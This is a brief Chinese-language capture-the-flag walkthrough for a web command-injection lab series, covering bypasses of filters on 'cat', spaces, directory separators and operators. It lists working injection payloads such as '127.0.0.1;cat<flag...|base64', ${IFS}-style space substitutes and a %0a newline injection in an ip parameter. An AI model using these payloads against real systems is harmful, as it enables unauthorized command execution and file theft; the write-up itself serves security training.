web rce 命令注入 过滤cat 过滤空格 过滤目录分隔符 过滤运算符 综合过滤练习

命令注入解题思路，打开环境，填入127.0.0.1&ls 访问得到一个php文件，继续输入

127.0.0.1&cat 32506276723113.php|base64，访问后使用base64进行解码或是直接访问源代码找到flag。

过滤cat解题思路，与命令注入类似，不过访问php文件时要在flag前加more

127.0.0.1; more flag_19336906025702.php | base64 。接下来操作和上面一样。

过滤空格解题思路，我们的思路就是使用特殊符号过滤空格，使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}来代替空格，进行如下操作，127.0.0.1&ls 127.0.0.1;cat<flag_229962408527938.php|base64，解码或访问源代码得到flag。

过滤目录分隔符解题思路，一样使用127.0.0.1&ls 进行拼接，然后列出目录127.0.0.1;ls flag_is_here，发现flag文件，列出

127.0.0.1;cd flag_is_here&&cat flag_19900138617064.php|base64

进行查找flag。

过滤运算符解题思路,打开环境，输入;ls进行拼接，得到flag文件，拼接

;cat flag_243452677723645.php访问源代码得到flag。

综合过滤练习解题思路，在命令行中输入/?ip=127.0.0.1%0als添加在后面并访问，

得到flag_is_here